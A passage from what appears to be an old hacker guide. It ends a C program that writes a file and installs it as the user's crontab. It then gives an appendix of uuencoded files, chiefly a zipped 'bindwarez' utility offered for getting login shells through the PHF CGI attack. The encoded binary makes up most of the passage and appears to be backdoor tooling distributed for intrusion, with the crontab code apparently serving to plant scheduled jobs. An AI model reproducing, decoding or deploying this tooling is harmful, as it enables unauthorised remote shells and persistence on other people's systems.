  7497.  * stat's and saves it.  After the EDITOR program exists it stats again
  7498.  * and if they are equal then it assumes changes weren't made and exits.
  7499.  */
  7500.    fd = open(HAPPY_FILE, O_WRONLY|O_CREAT, 0666);
  7501.    write (fd, buff, strlen(buff));
  7502.  
  7503.    close(fd);
  7504.  
  7505.    execl("/usr/bin/crontab","crontab",HAPPY_FILE,NULL); 
  7506.    /* Successful completion */
  7507.    exit(0);
  7508. }
  7509. ----------- cut here
  7510.  
  7511. *********************************************
  7512. * Appendix VI - UUENCODED FILES             *
  7513. *********************************************
  7514.  
  7515. 1. Quantum's bindwarez utility uuencoded
  7516.  
  7517. Bindwarez binary file for use with Quantum's PHF guide for login shells
  7518. in the PHF section here.
  7519.  
  7520. begin 664 binwarez.zip
  7521. M4$L#!!0````(`'>"0B)K$\T.%CD``.QW```)`!``8FEN9'=A<F5Z55@,`"GG
  7522. M]C("$_4R`````.U]>UQ41]+HF6$&!QP<5#1H4$<C$9.(X"MB-,IC$#8((\-#
  7523. MHX8@C!X(`@MG?.2*8@82QLF8B4DV^7:3K*S9;]W-8]W=:$A,%!\!\]B$&'?C
  7524. M%]TLV9CD3,9DW3P0$9E;5=UG9D#-XOV^W^_>/R[\ZO2I[NKNZNKJZNH^/>=L
  7525. M-66EJU0J0?E3"R$"88]I=+,@>$YB\;,$HZ`5XH110I002CA`/=``[()[!"V`
  7526. M!B`$X"0"I"&,A/N1/$W%@?X@#2'L/D%`P/Q")$N/!#SRDD:'T`$5[IHL4+V8
  7527. MKH;`_%,`E5:'X`8<(937,;VB;/7TBM)I%665MHWQM57QB<+Z5(B_FU>[@(>W
  7528. M`.0`+`;(`I@&,!,@%Z`0(!S@)H";`3#_(IYO*<!"?K\$(`W@=H!8@!$`>0`Z
  7529. M@-LXS7*`N_A]&,!D?J_G80CG>RC`?&P;C[\3P``0`Y``,(_'+P-(![``3`+(
  7530. M!I@-4``P7`C\H<R',)$)TWG<,(`)`I?UC_S=&'2/\H[B]S."XL<"F`"2`>;^
  7531. MF_)^[&_,5>)">7C#@/C1`+<"3!D0/Y6'<5<I*Q$@'F`.Q\?S\`Z`<0`10;0I
  7532. M/$0=C.;WLWB8-*#<G_!P%$`^@!%@(H_+Y&'&5?C!/GIJAT:'?(S@]1P''-,F
  7533. M<?Y0KQGMOWS8UNA'-+JUG![;$@=XA8;ABP#$1P+Y49]QW&@HOY[TM9Z7/P(T
  7534. M`G5;=`?H5P'(@-_,R[<"=`/^)L?78?V/!NAMF#\(_U_8GB#\`8`]@'^J8OFW
  7535. M(S__4.H/I[&Z;">S+YC^I(!C)=#>%R%L@O1ZGOXZE@?\;^0X\M4"^%2.OPUP
  7536. M"O`X7O\'V![`Y_+TC[$]@-_$\<\`="`O&\?/`W2"O)F\A@L]$)[EN!%["]HA
  7537. M`Y['T_6`SX7\6WC^$8!G!,E_#.#+@O#Q@&\$/$/%\,D0SE<'ZKL5\"9(WQO"
  7538. MRDL"_"G`E_'\BS#]4XWN3JHO3%@,^!Z>CO39@+<$U9<'^/$@_&[`3P$^A]/?
  7539. MB^T!?#5/MP+>#?B?>'HMX+H@_=@$>'00OA7P.'>`OP=1'H"G\_P[41[N0/\^
  7540. MB_)P*_TO"+]6!?33"/KY(LHGJ/Q]V-Z@\E]#>0!>P?$W`5\$\E-S^7V(\@BJ
  7541. M[^^`IP7)]PN43U#Y7I0/X/_B]-^A?`!?R?%>;#_H;X::X2$0Q@&^DZ>'`3X7
  7542. M<#,O+Q+PC"#]'P7X,L!G<?T?!_A&P&_C^2<#W@3X&8['`]X">"K'YP)^_%$V
  7543. M'K&\%,!/!96_&'#YT<!XS0:\.XB?0L!U,'Z6</M@!3P:\%\H_8OM`3Q/Z5]L
  7544. MS\Y`^8W8GIV!^EV`BSL#_?$?V![`6_2LO%\!_M1.13\%X47`]P`>R?$_8?N"
  7545. MRF_!]@7AA[!].P/V[2VL/ZC__@O;&T3_=W5@?%+_`J[A]@7MQ]=J-IX5_/L!
  7546. M.$ZX>R<$X>`O2-::=27%U>@MS!!JI9J2ZDU"656)5"$4I2W/3EZ2F2JLM4K6
  7547. MRO5"41$D2U451665D*FRN$)85UQ1454""9!<5E-5*4!2F21LJ"F3K%A69<FZ
  7548. M:A9"H3561KVFJMI:*:PIJ:BJM0H2E2T)16L@IU`L63="_J+%63DIR5E%.>GI
  7549. M%E->45YR2I:I2*`D8+@$69TMV"IK&5NKL9+J&F!J#;)HK;"62%BIM::FJ@9B
  7550. M5M>6%M66K45^BXI*I$W5UJ+5`B165@E%F3G0IE)`L'AK2850S7*5VJI!&!56
  7551. M:[5052T5UZQ%&8A5M=+J3<6EI35";57)?5:HA556M+%6*@;>:JW6^X02L6I#
  7552. MI;#Z?FM-%:17EF+.TJIUQ665E<7KK)"\KJH4F,?[XI(2:S5D+\)6,=&5K(%6
  7553. ME=566ZVE`C2IU+I14&2[AK=Q-41#R1+R4$79UU3;BDJJ*J6:J@I60!4K`%*1
  7554. M%@2/]];*BJJU`HD=;_S2JX*^J2BKE;!3JFKN8_T%S0&^L7CHLN(*J0S8+:NT
  7555. M2D654E6Q()5`8K$DU0B44+NIEDH4;=!2:+Q?5M1*P&JM->LYM@;0$H6"8FIY
  7556. MNR`.N*YA<5+-&BH:.U2"]I5L$(I(`4AYL/5EI<!&+6=#Z5C0SJH-UAK62LC!
  7557. M>AE:NA'D9"TMEHI)(6JAUXMK,`K$\\2'*3A&M&/97*>-87.4=B*SM=K9S*9J
  7558. M;V=C3YO/QJC6@KZ?5C<$YS0,H]`?@7`4^L40XEC&<#3ZV!#>@/XMA-'H)T,X
  7559. M!OU9"&$PK\00'--[,03'K!1#<(9$#,%IK<`0',-J#(V"(&$(!F$CAC"Y;\80
  7560. MG/!Z#,%X-6`(SE,3AN`</(SA5%PK0`C._^,8@C/Y%(9@G)_&<!JN92`$)^LY
  7561. M#,%QWH,A..`O8`@._%X,P1%^&4-8,+1@.`O]%`AADFW%$)R/8QB"TW@<0W#>
  7562. MW\40%A4=&`[%-1*$X(2>PA!LZ1D,80'0B2$L4LYB"$95QA`6'.<PC$!_!<)%
  7563. M@O`]AN!\=V,(CGTOAKA@@/X9`HZL!D.85'08PB)%CR$X[)$8PF0=A2$XB]$8
  7564. M@J,:@R$XKD8,?X)^"H2P<(G#$-R@VS"$A5("AK#PF84A+#+F8@B+D/D8YJ"_
  7565. M`B%,1FD8@O.9@2$LJK(PA$EG8?F,JB$[;(\_U_-+B[P"%.B((/AF)P#WOMA9
  7566. MW`_TQ:)6B7CKZ?3!7RQJEXAIG@["4<M$G&(\K82CMHGH2GOV$HY:)QH1WT4X
  7567. M:I^(+J+'33AJH8C+*D\]X:B-(KJ,GFK"42O%18C?2SAJIXCNO,=,.&JIB%.N
  7568. M9Q'AJ*TB3I&>!,)1:\5[$3<2CMHK8H,\D82C%HO5B`N$HS:+Z.)ZSO<ACEHM
  7569. MUE/["4?M%INH_82CEHMN:C_AJ.WB4]1^PE'KQ5W4?L)1^\4]U'["<12(>ZG]
  7570. MA.-H$%NH_83CJ!!;J?V$X^@0CU/["<=1(G90^PG'T2*>HO83CJ-&[*3V$XZC
  7571. M1Y2I_83C*!+/4_L)Q]$D=E/[+R/>0OVOPO83_CKU/^(=A+=2_R/>2O@QZG_$
  7572. M]Q)^G/H?\5V$OTO]C[B;\`[J?\3K"3])_8]X->&GJ/\1OY?P,]3_B)L)[Z3^
  7573. M1WP1X6>I_Q%/(%RF_D?<2/@YZG_$(PD_3_V/N$#X]]3_B)_O1;R;^I_:3W@O
  7574. M]3^UGW`<Y:*;VD\XCG;Q*6H_X3CJQ5W4?L)Q](M[J/V$HQ40]U+["4=K(+90
  7575. M^PE'JR"V4OL)1^L@'J?V$XY60NR@]A..UD(\1>TG'*V&V$GM)QRMARA3^PE'
  7576. M*R*>I_83CM9$[*;V7T(<K8J(>P^>3L+1NHCH\WLZ"$<K(Z+K[6DE'*V-&(WX
  7577. M7L+1ZHA&Q'<1CM9'C$/<#?A3XJ_V;'K[[M\L=WSFZ'2\K3H!_QWV5DWBU_GY
  7578. M^8[/S9:E+3C6#J`!^G.],VVR;C<N60RO:'$V-,LKH4C[,8W\/?`NXN)6#N<Q
  7579. MMT#I,B[_S?(4B%KA>AG]:($'*&`HT'N!XY8#<="O]@5X%:0(MS/$UV$_JK'?
  7580. M(=B^7W'4->>HV^T&?NSGC(4%EG;3.<Q^`#>,VDV=QX&A=JUYA%97<:,6[HPW
  7581. M*'=Y$-<T`N]F&;2ZN!OP;E$DNVO&;+LWJU%:P+<SOS/7(J^[C,SK[=T^0P,N
  7582. M7UP9A^T7IQL>\D!]OLFNVQ[7Z%QS)OQ,H],/@*@GKHP;+,C_C;P*G'N\/W[\
  7583. M&F6>@GCG;/1H#B5"JU_%_:_>/<)W_VEH1)OAT[X`4O%\!9;(-8?3S4&Z(0J=
  7584. M+:(^8C*(;[CG32!R<YH%2!,VD$;M:0ZB24<:W4`:C:<NB";[JC0ZS_(@FH+^
  7585. M-*6,)M(S&VG:M7LNL160)Y;A>Q5\%.+B/9!;M.%E!U[0QY,W]&"O1WJ^@]YW
  7586. MK1?,XN/^I)64I)?GXX#YD*4WHP,X]2AHC"OJ`4=^IWT!"DTP-."&@/V2:DNX
  7587. M'('D_R$0:BL2_\`4S*DVR\]?P@)UC:TVB6+*A?+P<A@CN[N)AS6[/X:RUD#R
  7588. M.)9!W.?GI>,BC*@_81W']&N:D>[!8]Y$UQPJ7GP/!]\2?^FCQ;_X,SX)&<M5
  7589. M,HY_YR(=JP+J596KY:>A6D<[%-CHJQLI7L(RDKJ)NN82ZD"YQF4Z9RY7EZL*
  7590. MY6HL)E(\!;D+9<M%K,G8V%H7)0[]#+*I6;8[+I&,D+[S(F>F;K@8B21_OT`D
  7591. MT4#2;I+19W&[3+*9E]B,K+0A*UU0Y@V8X266X<L>*E/^)10(37NG7"B0=T-2
  7592. M@3P-BBJ4IU"K([U#77,:3V_1RH]`R>71Y5IQ/!;BZ<;JSF)U+M-9LVO5>4NY
  7593. M(-=2QT8#<W'-:`3,XLV?*?):"SG$6S'O-,;`@\C`'/L"TB4IB@LE#"0HR'=3
  7594. MQT6U:],BF<MFD;>"84IL=5E/KKBGR'%NU5'@'6R7>+N_@E"L(-V/7H!:1+,?
  7595. ME1%]P(_^UP62M-CDCVE'@AU^M(4Q>1BD@S9RVSF<+0HL/NV]8/J:\;*['B[`
  7596. M;;1\!L0`-T;Y0W9SD_PVNYDB'XY$S3)ZM?)6<`\-![7B<+#(K9H].MO7VT=5
  7597. M`V(X>(3A?X/46G_J^X!M\&.'NXYHI)CRT&8TM&;Q&Q"9W(9-(,L;"OW;17F#
  7598. MB;Y'HN8!1!L&$/4@T>8!1.(`(AF)"@<051/1:.\0UQQY-RR$FE$<25H)KIN_
  7599. M4;BYP:M#';,'TC?S]`W!Z26!](T\G7@P-)R#OF<T"P,TU?UIT&]LGH^<RI-H
  7600. M(&L:6PV-?Q1P<:=2DES/H"=LD>_M(MOCVH>.(90;1%(@IT*BO#U0W(=H;(Y%
  7601. MPO!8VX]N*"NDL54*XUS87@DBL,A?_:`0Q,OS^C-BD?_L3QQ.\19>VYL0WX+N
  7602. MNNO7W6`45]R#:@ZZIW1(RA7*UZ^#]O\0W$'4+T-O'B`S&CASF#[#N'*:P#O`
  7603. MR@7;4'(>6+K9U2C`8#++G_U`MN%L8BLF\'&@PG'@7*63/X7E\^YE4"Z,]Y'B
  7604. MDS!TFM.H(<MN0;'I#(="S#"J4S5F^?[OE"8/<0I>`\C=B=&/D20TY0O-8GTH
  7605. M#+JCW_M\;=I#<"N4+Q);PR'J/)"P.VH?&A<IT@G3"<7-^):LH1P**_2V1NQA
  7606. M0>GHQ;UH^<I5)%QHA+9E+W!H%EO0!)5#198"5FDYK/*;L1EFSCX^LH$NZ%.Z
  7607. M@+6[6B,(Z"8U]H)A1%G)23<*0I?6`GVCLNEAM(?(J<.IX7"ODMOU9`(FR`?9
  7608. MC5:.A=1V;0;2"Q0U4?Z5GIF'4+=<-)GL0U6P?5@*2-<1G5351?$:*1JLA5<O
  7609. MSV2T2P.T783H)%.7EB9N:8;X!G8(Z8=\`)KK'(7W":V.CWI?127[]B7'\0L=
  7610. MKC2U;S<F$-OR#N)'PTICK5+)Z\B&Z5S/8,LMHC$/%4=OEC\_#Z/E^U!08'$B
  7611. MQBW1+94_.(\DA-;I"^4CY[%_)I=K+#`AJ[A\Z[Y%TUH>)9\]3S>CY=.,3-0=
  7612. MACETN/PNQJO%#[&GJH%UQU$<A*<WCRX7Q$EY.!F48S5RP_<T18EGD/`W5`8,
  7613. M?2D\X*^(GT(2:',?:O/L5&J'O5ME6^=RX<+`X>K&F?69;FJ8!XN)`2)'FT4\
  7614. MAX@!D48WI?X3(_I2(`*XB;:_@;&"-,9)-_4+!6E8(=/)9__)9NC3MF$'OH5,
  7615. MWB$'OH,@L8N2"^2WIS`V%A"3TLCZ.R"O6`_3I46^/X[2G*-$<+4;3T@WN%)4
  7616. MYN;G+J'B(H6L(H77MVLQ#F,23A_$P'&AZ92_7]^^<,+1D;$;RV#JH)+FBT//
  7617. M@KL4@5V]5'[^6T4?''_ME_.="Q\ZGGD<99(WUN<8Q14#?#'<T:Z+L"_`,@7#
  7618. MPSTP&;N>.`6$B:WD-H)6??>\ZXD6B`G&G^J'-^."(8E,E"V,E[5E&.B-X7D7
  7619. MYO3JP3^NTQN>?P-+;C:3X<*%!U(3"UOTH'F&YQN).ISE1%K[@JSA:,7"G740
  7620. M]0966RZX&C$$8];"`B0TET?*7R\"?HZ`>]%X8NMD>X_/!NVB+7]#PP@0`XS4
  7621. M`]^0+GE"?-PW!8X-NZDXP\[6ID:44`,I6A8?S<X(1D/<&'8>;G(1S5N&AC^0
  7622. M^0?C(>*BB0^!GX..[,86D5&L&\T8&&J+:->^P!\>>*/=O-&&'4XU6@YEX<7Z
  7623. M5"O-;<9DLWC+6?]`/W%^$`-=SPK02&-8`<U8L%E,AF+D'Q:0)XQ2WMUXJG][
  7624. M#0W;5$I;6L%R.I?HE\H=("K'$0<I+#;F1-U$YRALC+UGJ*2U]VAMP]NUU-.T
  7625. MFP,%H,_'U&@'^MU=6BQ++4V7+T\$.2Y`'MN&^'RD)M2L-N%;AC'US71$S#6@
  7626. M%'Y*)C%M^R@LH.M(@I1$6SZB#RY-':VRUMZI,I=/%'N42#$M(*D]_PR:+8V^
  7627. M")'6MCBJ#D-I'GQL[':.P_26.$B:>@K,AF''#O0-D,BP/])'U-F.V9AU6P]6
  7628. M8`MK"PGFO"F2(?:>"%M&E]9,1G6AHOEQ5-+VR/J><%N,GQ[C6"[&E-?@YE(0
  7629. MN!2HPL8NPR.X3P!3./14RP#-C*(LM](*O;$5O'<KR%890UIYH0K--72QJV6@
  7630. MNN+^23..N5MI\0^>U([+N.DP=P)TWW=\'2+(4\?A'-EP">?((NZGR%%`(SNC
  7631. M<#1@"3X:N\Y1SXW6ZO9N!6NFWJYN4@5\=_DL.!#RBBOHCR%]S%7H7QX_D/0D
  7632. MDHX-)@4Z9H?%I8'./O#UOQT6SKI>9:Z7CX\<6,^[6(]F0#T6SSLP%("WEHH)
  7633. M*"\D)2TY`M$TJ`S[HWTT;'_B&(6R;U[6JP$2G>&A=1K<^VB,^S7N?:R%ZPL`
  7634. M60!S]VATU0`K?ZO1E0)4`$B_Q;T8S(N#J/&TH2%7@ZO@<$-#)MQLNT2Z-YR1
  7635. MH#7RS-#0.+L481O)U$YC"V?)^%R;^K<IFC7.$TJT+GL4[C%UCS0\]'@(\7:,
  7636. M>%,!+WJ`:(#O?Z/1Y?R6P3*XG_N?&ET4P&:`90#ZWS#`]*<@?!G@&,!)@+,`
  7637. MDZ$,Q3\99A'O18,3%TLSGOPZ>+R>L2$D3TYC:,"'[YQ.8'2>5C(9_<LX.YF5
  7638. M@=.\YZ_JX#+\-*V<ICH&=.Y+\,2:7QB-ZBV-W![9<$**8#*)9#*1:T"]^:@;
  7639. MC"7B[*[`9]G?HJ%9AU4N855ZTB#:/9"?!,Y/)SB1<N%P[,4+V(M#FL\`7UYM
  7640. M\UD(D#5#@T:M=%FD!X^^75'6V9NH+#ZWC(`2=^.\%+Q<:!B!YEGC02_?S32!
  7641. M-OJT9M2JH:`&Z-."W%@:[F!YO@[0XHDIS]\"..Y<>?X<P.G1R1LJXJV,K<KP
  7642. MX(C\$E@33QK&RW?@;1+9?]D'=L,SC>[[Z^(8BN,*'<G*QB?QGF(LHQF972!$
  7643. MP,"RX^8X9L,H3RKC?=LEM/^&!MQ<965(*P-Y:L=19R(>%*E3"J$X>VO?;@QW
  7644. MY_72]B<7CCPZ3!""AM?[O<PO"!03YB\[(%S/"SC6`C3CKU8_9#P_"`:>T"D,
  7645. MD&^0[[;(_\";T;#6!/7P#K/(<Z#3O*$6^>XAP:30Z=XIM/]V/Z@*K%%R9##P
  7646. MF,IBY.F?TT;'*1E-)!JIQA.&1W"?V;FJ-V![<<%GK],+4E+]@?D&=+7"NNS,
  7647. ML!1LIQM8A639+X7:PNMC"P"]X`USZW5-E-1GQRP6<4ZOWR)/E97I-\3OD$1*
  7648. M0RWB8\C32/0$6/5HSVFYF=B5Z`M2_%\BG==(BK^=RH=I[[:F(WUO-SV&V'R5
  7649. M-)YS*.DT?4U$PGDW-*+NL52=H5%+.XQ3#`^=QF>#DY]Y_7<:G7OE\V!W`1X!
  7650. MV,%#A%-!]_\=V/%OTA#JKT&+N'Q3!*XAY1A8G,F+X3X=>SH&QF.6HB2&^@@!
  7651. MQ!52'Z'#(+VQ2QI>[Z1&E\,:ZF:PEM[)K&\`]T:Y<5]U=*``6OS%D`[I6#Y-
  7652. MHT]2^SYR6;]7-N'F!.O&+0-U0UJLZ(:T8/*%_LIP1T`98KZXAC*\B)T<.L&O
  7653. M#`%=#-*$`TB$>Q'_7A-L5VK"MB!-:)`43<BF1Q//'']!@WM/&U_4Z$0`_4O]
  7654. MP7V5N/\3:/TWY9R$]*<YC3R`MO=%M!-9BF5Z`N<'&0\`@).&!W+E6X<R([#%
  7655. M-8>/3,_C0+1=B[HQN5>O:J*[[5J='\<[;[9K3O`$@OM'WGG]XW"OSWMS_SC<
  7656. MW_..Z!^'>WI,$9J.U/_C0M-CI!,P+E$-#\#$7[\;8R[Q7G8/T*F,R""=4MD4
  7657. MG5+;%NC5BDXAC45<%-"IXY]=0Z?>0G7Y8\P`G>(F)DBM/D*Z[3%<K;#\@%HA
  7658. M%E`K%3,P&,F9-31:_&JE-C2F*VHUAJE5S.\UNG<!7@>(WPN^$0^_@?![?C]8
  7659. MT%T'[?6`?%1']N7IH3B[P)S])X:_"[C\D8[;F[O`WJSDYB+=NX#6!A9Y?I_2
  7660. MI;W>/(BKCUB-@B@7RD?(^+R>X2JY(XK4]&^TOZ0'\S2"F1DU%G(!]`+6/JQK
  7661. M,0)/[[%TE<O:S;;FKK`__77%;W_48'\N]]<54T!7GO[T&KKR&>K`@V-_W/[\
  7662. M"XF*QPY&46Q7*@J>1U84I6$7>[@E3=JJ:SPMZ;WKT8</D6[UKG/+,X>0L++"
  7663. M>7_<Q/#>,+3_0]@83W?-V4X;DCC.+C>-PML]*DD/D@^13_31OE1]+,;V-6.W
  7664. MS5+MQ@"\X`3:O[2#7^.-=0?&ZF4^5E5LK#[B[]B^H+%:8%&D,5&^#+WD'$7N
  7665. M#'HP4SOLK6IS;OE\^>4QU,GDY!CV"\SEL;=>LG=/,CR4R59#L_X(ZZ"7-;KU
  7666. M^_]G0/K3M=,F0SVM?PS@YP?4NV@?KE6JF2_[6UP1#3!\U)(D+;;2\&!3")Y$
  7667. M9XUJ:#4T;@SAGI_R)'+,&=JJ=!RE6(5T_FV2T3D*BV"^;5*'P;X@J*CYM]F^
  7668. M[%>/,00[G179=IJ*-%O*C?)X$*`G)(3\;_Y4Y`=U?YZK!_)\4MV?YV.TR82[
  7669. MY5EJK:X%+PLDN-2F!F5;/X=V/JB#\4A?5YI9!<K1C,?UG%%NVFS'512&V^C1
  7670. M`A91\P8EM`57X,G#A=H<OK-M:#"IN<B<$5A1TG&#?09$@:XXCA[^3!?D(V/2
  7671. M#2PI[.B`>%S%8)8CA_\Q,,M9EA1VA,7G6LHGR'BZU_..?VVAB.951LH(&UL-
  7672. M#7BT!9?VC;^DY6<^#F9#`YY%EW^/ITJ:V%J&V*?^Q)[$H^[!`BY1]>\1G"K;
  7673. MU&!4*9]9]*$AZ3BM+)/X^D+A*;8_3[81`V=8;YB]&R:;R\JB(\#(5T(P(U(8
  7674. MU[4:;[\*CN$V;9OCV\33@?'9K9)&;$7[$..M`%O4K99RO"5N8-HY#M,='WN7
  7675. M`9^`%\B/*(_>I'%@NR++598".8145(_/D`ODGYVB357G;,H)U7AC^K=Q_3A_
  7676. MQ4WJE&#>'BKW^7Q4RU1_+=%0RS"JY9F/P6J%05D%\@RHPS\YH&TJ%\1+Z,I.
  7677. MDB\IC[?(ABO/L>2L8<J3(U];HPJN/6V-:@BT;8TA]#CI"0T$"6\9]A_NJB<S
  7678. M+8UI4U]*:0I/J;]XWJ9I4Y^'&Q_>^%+\1#HDNGQUHK[#]1>GK/\]V[_42:/:
  7679. MU#TI;>J)*=OIT1"T'*F1$$/V-,OQUZF?`*_'T)_[103--/X)J,!2?J=<`#.I
  7680. MO"WBRN=6_J=Z=,Y'ATNI.IUSE=YIBY0_Q=G&-T'2V7U&::%WE=LQ;@]VS>SG
  7681. MJ&L/_R/2\(JI.ZS#8>IVG%\#5Y>IVRQ&Y2F/R^2S?V7=>Q/(U#'N:<J["ZX%
  7682. M\B<:?$KS'%SEY]D"0OY,#]Q9S_&%@]O/CXR_G#N(;+[:-%JK>^U1N!QZ'"X'
  7683. MT*MP%^86./)['4NZY9_AMJX=:9Q+NMO2QJ@%N(30;G5^K_V(SMZNLQ_5I=O[
  7684. M1FQY.U`1K1]%7&ISIJ?_E\]W:#+@!S&REP[8?/=K4!H_??ED$=,IDWS^+\J3
  7685. MRQ$44:XT_@*4$]`G9[[>N232:=)EV+N'&Q[:3XY>H^Y56C_L>DVC0W@*T$7\
  7686. M'F$OX&:`97`O0E@/T`T0"7@<P'&X[P2HAOLF@.W:41&H(>TJ#/&7#M2U[NW:
  7687. MD3Q^Y(#X*!X?-2!^.(_'L&5U('X$CQ\Q('X,CQ\SH)RQ/'[L@/@)/'["@/AQ
  7688. M/'[<@'@CCS<.B!_/XS%LF12(OY''8]B2$HB/X?$Q`\J9R.,G]HL'B]*NHH-S
  7689. M(?YGW_ZXP#-O^[DTT%,Q_G.83#(N0Y?)]WWD\]&M*T/G6/*Z:V-88A=Z?P\F
  7690. M`8USR>M-JK8A"<Y11&%J!?]')3]UDNO1Y@6)IT$GMMM_`K1-0\K5O,R'/L('
  7691. M*?C@\,268137MD@K.3J\(]RI]DN&+>^!9ANV/,T."%CW!H^C.IT@#:V/T$/C
  7692. M=!AIC\7;"_W3[;&HOG_'R/H(O#7V2Y_0K(.XV/?!>N@3=N.]/58#USZNXY0\
  7693. M^?T(//1*R?41F*SLA3=CB8=E[2R5O=,?AP3^"#9.*"X6?Y6X`"^&QUMC?7[9
  7694. M*[P8ME'92$`\;B-.?%_R`8=TS7JJ+RRX/IZ7&N^[S(C=VT@L>'@GD%<@'E3!
  7695. M\X$S'SP>D+E]`5Y]DCXIL@[<4YU]KL_VO7.1QLRLP8D/@W@89)X[@_.`S0.#
  7696. MK1970.?+C_^%'<[2-7;YGVT7R#L^P$-8>\CN1'+EZ*.Y&2>^KKHH%L=W>^>&
  7697. M,?,:14]!T7(+^+04#;D@W5:N<ZWJMLAWG0!]Q2BPXCW-S[&;;@O9\@)YW`=T
  7698. MV(HK$.M7#0FI_EU5_=E_[B;KN8O<CJW:EOI8/'[:2ZL)3?/3_:/_`-%R2P^V
  7699. MX`&!/V[WV4:*I9_[3X<\J`OL5H-'L27,+!\XR0I#RXI1H69Y#T0YSKNLYP-S
  7700. M&:Z[RFF!>1]P3,>7+?(NO%73K>DDGE:IT](0&;"7(,]EB2/%R@`GO4/8<0U!
  7701. M'$:G"J(Z^!@%L@T!LK\P,O`WAF+E6XA*A^NTH>!_R)4*KI9&EZLM\CU^?$NH
  7702. M1>[\$)^1]UL_TB1,,_!-)_!P0^-IJ*\A4)_57]\PVH)[XWWP;V+H_!]@OP=,
  7703. M_B.H=T$A*&"NC#_^#FS(47L/9.#TY4`5>Q2H=R,*$UB$O?4RW1_(@DL[VCSP
  7704. MQ_'D,48.W&\%_L2'/\<5C/P<:E^[N/-S/%'X)"&60GD'BWV"8K<1@B?J_@.K
  7705. M'?N^<ACC#A81!A'F0IKK643W>Z3?]7.GV:++1XK/8DTJ>48';4:CON*9K\<0
  7706. M%<0_0J+X"N;Z!^02#P5$-2\TN/%L'R<?_9O&$[8)Y0E$CT85']W=U:[&']W;
  7707. MCVC:<080'!_8YX%=A'KLAS7V),'6[:SI=6GV89JJ(^FP+=%^I->I=E6'.V;8
  7708. M6_7F7#FM`TN#HD,36[WCP1\^H@ED<66I3SG&M"=KJ.R.P!:%LK\TFZ:#>[06
  7709. MN6."XL2.%)_"MN'%(K](T7H1G0<^[H^\AP(H5]!:0-O2M=7!)+_L3V(FN<;!
  7710. MM,(D5,TD>K&#G6,L5`Z$S!!?^=*_`?*+CL&<#PHZOB%IY9$A5SG7@/P&G6L(
  7711. MAYJW=E!?PHH%._BGR(?"PTRS>"S`Q.C!,*$/'(.0-_T#31Y[ICWF:F?5Y4*@
  7712. MX`]VR?9.1M6V@4WL="OG5O[>^]WSAN=MG6*>#_H`!>E*5YGEM\;S,R)X/B2,
  7713. MGP^1WFX\41<I_AUY9D[@:R`$PVY;IV%G:T.K;0BH!?I[Y'2[K!U!8[+0XAQ'
  7714. M3]7'T5/UTUNJF1#"I)D6\8N`$(:_/_@#'#HIRD*'9,QBWY=XQI@V*_4\CG/8
  7715. M^2X[/Z4'*S.ZF0YF=`^59MF[-=)T&-K%E_E!&]6IW4'G;:*"#_PK@D655L89
  7716. M>+KU<WV2=A'BAOUFU;8>/&8A16V>L:T'9ZNMM]A;0[C^N\QJMV&_.F4!/=;[
  7717. M@6[Q29WM*T<'^2NMZH"OI8$^.H2_)7#-*91W^M@,J4F:C<I7HW5<\'K<[:9>
  7718. M)$BBLR+KK?4+?3:S8?]BE3:,'F&KUJ<X^@KD@D!>HAM9?Z?/-LRP/]U/M^%C
  7719. MQW=3+X'%Z,TME#>`H%1@`R_@BN8Y=Z$\VL=.<6N\/Z/GHLJO'8"<G8QJU^+3
  7720. M7QK[.$T5!;?!PH]7?7CK.#J#<=JPXS\%Y<FU2DJUB"I9`]9[XI_])[$^2FA5
  7721. M^OO"!XXEO:Z50WT!%6!1>>'^4UEZ)SU\;GQ+`O6D1S:V&RTT1!77X/.W>==[
  7722. MXUUSG*,PR?'.U`_Q,'T8J'FJS^S5N&$&R^7TL]_V'[6KNR%PB"?#WJ.14D%7
  7723. M9N-#02I&];&#PJ11R,*&\(`DDH@[U!_E)R$!P:&A#K+3-K33=+CF5B)..E6G
  7724. ME=\`_\'"QD*!?!884M$9G'YK>EB[L[.8.$N9]&9Q#(C2M0\/]!7('>_`:KW5
  7725. M<2%XZ&2889GYT5MD"#N/4^!YQW^N6T/G68D;&A]F>3[0F"UB'!;[#!9KD3>]
  7726. M@P=&Y2WL=.XE98E-/ATS*C"E'W@8Y]T7T.D;\Q:;`+ML<P\F0CG>1/3Y0^??
  7727. M)(7.7R2%>Z/PQ0N_P[4,:6J6A32&+O5KW]M"FD-1MEYZ'`J1)Z?5W"K8_
  7728. M$UD+QDP]92ZTR,U0KC<4]UQ"A#8MQO>?_U`F>*!PA.%@B#F5]LR!#8BQ?=//
  7729. M!X%9LGFCFNW581B0[?<"DZT)U[S:W9@(Q/7S!$-#!9WZB\9Q\03^SA#BMZOG
  7730. MQTHW&`ZVFE,<^3KY5^QW2IXY2#G'9](1B>8T$-B[EQH>NI$=+3$>IW7QNV]I
  7731. M=(GO_-^!4_\7ZT9X>D#];L#GOMT_+NHJ^6(`]``BSS\9H'PZG_P_:U-^J:)G
  7732. M,9Y?X=[F(K/GYQB*J)^>1VBOTK7J*8L\\SCJ]M_:0=W%E3#_E9>Z5CUMD5^G
  7733. MZ)?H9ULQGK5$7QXKOXE'=`KP"&`]GG@D%<B5#4J=AH<70%K]&Z@?H"SXZT?G
  7734. M/J0Y-$,._K&3H6$4))7'RS8H3RDEF2K3>7`2<8M)D$&\`R[RQ'9FD]""-OP-
  7735. M=XK0AP/=L<AM[:1K]+,RW!NR]X7;QMF[;[)%6^3?^=.DO]J[PVU?>]]'/Z\[
  7736. MUG9[6R,>=(JUR`\&:.YN:AQ%&X!H\]$%(!JS[.TEKKP[<>\SW#:Z/,+1J(<4
  7737. M^;5>MI=)F)E'_AHB60Q-.Y[E<.>VR#M`0-Y99!:\H]WBWF$0#G.+\1B&NL4J
  7738. M".445AX;,#C6&O%WE:Y?X^9?O]^[%#J7`(G>WC-EPW"GYHE[^Z"3EXJ+T<),
  7739. M=KL>X&>X*&UE3R!-Y\Y=*N;(?C?C=VV#/1!'\UD"&(3M^;J#2.8_[=0Z4A#P
  7740. M>-+OH#=?70EEU_?,MVE?+82[I6)QH*X[VZXUQ9WJ-Y_9ZR+5AAWX(U?GJD@\
  7741. M@+I?BNXS[%\9[7.L.KFMCWP'O7+$)Q'5L):FT$_>'%3Y.GL?R6P?R4RTD\A@
  7742. M'#P8)+-])#.6!OY'@?@0U;#Y35H77D-@>6JECKJ34S:,=*XZZ8QY!BNQB$XL
  7743. MZ!:WTW12J]0R$A"GII%51.GA;LAB$7=05<.#J[IZ>_)/L>K$1R&'<]4IBWSF
